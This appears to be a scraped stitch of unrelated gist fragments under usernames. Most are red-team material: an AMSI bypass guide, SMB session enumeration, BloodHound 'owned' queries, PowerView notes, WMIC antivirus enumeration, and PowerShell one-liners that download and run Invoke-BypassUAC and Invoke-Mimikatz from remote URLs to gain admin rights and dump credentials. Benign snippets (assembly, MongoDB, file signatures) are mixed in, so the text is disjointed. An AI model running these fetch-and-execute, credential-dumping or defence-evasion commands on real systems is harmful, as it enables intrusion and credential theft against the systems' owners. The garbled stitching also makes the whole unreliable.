gwhite-so

[[testCases]]
id = "1.0.0"
name = '1.0.0 - Enumerate SMB Sessions from Third-Party Utility On Disk (NetSess)'
description = "Using the third party NetSess.exe utility to enumerate active SMB sessions"
tooling.name = "NetSess.exe"
tooling.references = [
    "http://www.joeware.net/freetools/tools/netsess/"
]
executionSteps = [
    'agent> upload -File NetSess.exe',

D3Ext

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

yezz123

Pentesting-Exploitation

Pentesting-Exploitation Programs and Commands , Protocols Network / Ports

Table of Contents

• Table of Contents
• Recon
  • File enumeration
• Disk files

Gydo194

; print all command line arguments (5 characters) and exit
; for 64-bit systems, Linux syscalls
; for simplicity, this program does not calculate the length of the strings.
; assemble with: nasm -f elf64 -o args args.asm
; link with: ld -o args args.o

sys_write	equ	1		; the linux WRITE syscall
sys_exit	equ	60		; the linux EXIT syscall
sys_stdout	equ	1		; the file descriptor for standard output (to print/write to)

bradtraversy

MongoDB Cheat Sheet

Show All Databases

show dbs

Show Current Database

seajaysec

{
    "queries": [{
            "name": "List all owned users",
            "queryList": [{
                "final": true,
                "query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
            }]
        },
        {
            "name": "List all owned computers",

jivoi

# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

qti3e

About

This file was generated automatically based on this two sources:

1. /etc/nginx/mime.types
2. http://www.garykessler.net/library/file_sigs.html

File format

This is a JSON object by following structure:

[string ext] : {
 signs: [sign]

HarmJ0y

# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
#   tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
#   https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

# New function naming schema:
#   Verbs:
#       Get : retrieve full raw data sets
#       Find : ‘find’ specific data entries in a data set

xorrior

Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct